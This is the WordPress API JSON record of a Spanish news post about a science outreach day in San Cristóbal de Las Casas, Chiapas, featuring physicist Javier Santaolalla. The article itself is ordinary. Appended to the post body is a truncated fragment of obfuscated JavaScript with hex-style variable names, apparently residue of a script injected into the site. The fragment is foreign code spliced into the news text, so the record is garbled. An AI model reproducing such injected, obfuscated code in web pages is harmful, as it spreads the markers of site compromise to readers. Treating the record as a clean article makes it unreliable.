{"id":5859,"date":"2022-10-15T02:00:57","date_gmt":"2022-10-15T02:00:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5859"},"modified":"2022-10-15T02:00:58","modified_gmt":"2022-10-15T02:00:58","slug":"realizan-jornada-de-conocimiento-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5859","title":{"rendered":"Realizan jornada de conocimiento en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-14-at-3.21.18-PM-1.jpeg\" alt=\"\" class=\"wp-image-5860\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-14-at-3.21.18-PM-1.jpeg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-14-at-3.21.18-PM-1-300x225.jpeg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El Instituto de Ciencia, Tecnolog\u00eda e Innovaci\u00f3n (ICTI) realiz\u00f3 en esta ciudad la Jornada del Conocimiento 2.2, donde la finalidad fue acercar con sedes alternas, actividades cient\u00edficas a estudiantes de los Altos. Dentro de las actividades, Santaolalla imparti\u00f3 la conferencia \u201cSuperh\u00e9roes con bata\u201d, donde interactu\u00f3 con los estudiantes, haciendo que los asistentes se interesen a\u00fan m\u00e1s en el mundo de las ciencias. Javier Santaolalla es doctor en f\u00edsica de part\u00edculas y divulgador cient\u00edfico espa\u00f1ol, quien se present\u00f3 ante estudiantes provenientes de municipios de los Altos de Chiapas. Al concluir la conferencia, Helmer Ferras Couti\u00f1o, agradeci\u00f3 su participaci\u00f3n en esta Jornada del Conocimiento Chiapas 2.2, y sobre todo que se pudo contar con la asistencia de j\u00f3venes estudiantes de municipios ind\u00edgenas. \u201cQueremos hacer que esta jornada ya no se centre en Tuxtla Guti\u00e9rrez sino que en diferentes municipios llevemos estas actividades enfocadas a la ciencia, muchas gracias Javier Santaolalla por esta conferencia que seguramente va a ayudar mucho a las ni\u00f1as, ni\u00f1os y j\u00f3venes asistentes\u201d, expres\u00f3. Por su parte, el secretario para el Desarrollo Sustentable de los Pueblos Ind\u00edgenas de Chiapas, Emilio Ram\u00f3n Ram\u00edrez Guzm\u00e1n, reconoci\u00f3 el acierto del Director del ICTI, Helmer Ferras Couti\u00f1o, por haber tomado esta iniciativa de haber invitado a los pueblos ind\u00edgenas. \u201cReconozco y felicit\u00f3 por incluirnos porque a los pueblos ind\u00edgenas tambi\u00e9n necesitamos llevar estas ponencias y espero nos sigan tomando en cuenta y que el d\u00eda de ma\u00f1ana no solo sea San Crist\u00f3bal sino que se puedan llevar a otros lugares porque hay muchos alumnos que no se pueden trasladar a otros municipios\u201d, indic\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El Instituto de Ciencia, Tecnolog\u00eda e Innovaci\u00f3n (ICTI) realiz\u00f3 en esta ciudad la Jornada del Conocimiento 2.2, donde la finalidad fue acercar con sedes alternas, actividades cient\u00edficas a estudiantes de los Altos. Dentro de las actividades, Santaolalla imparti\u00f3 la conferencia \u201cSuperh\u00e9roes con bata\u201d, donde interactu\u00f3 con los estudiantes, haciendo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5860,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5859","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5859","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5859"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5859\/revisions"}],"predecessor-version":[{"id":5861,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5859\/revisions\/5861"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5860"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5859"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5859"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5859"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}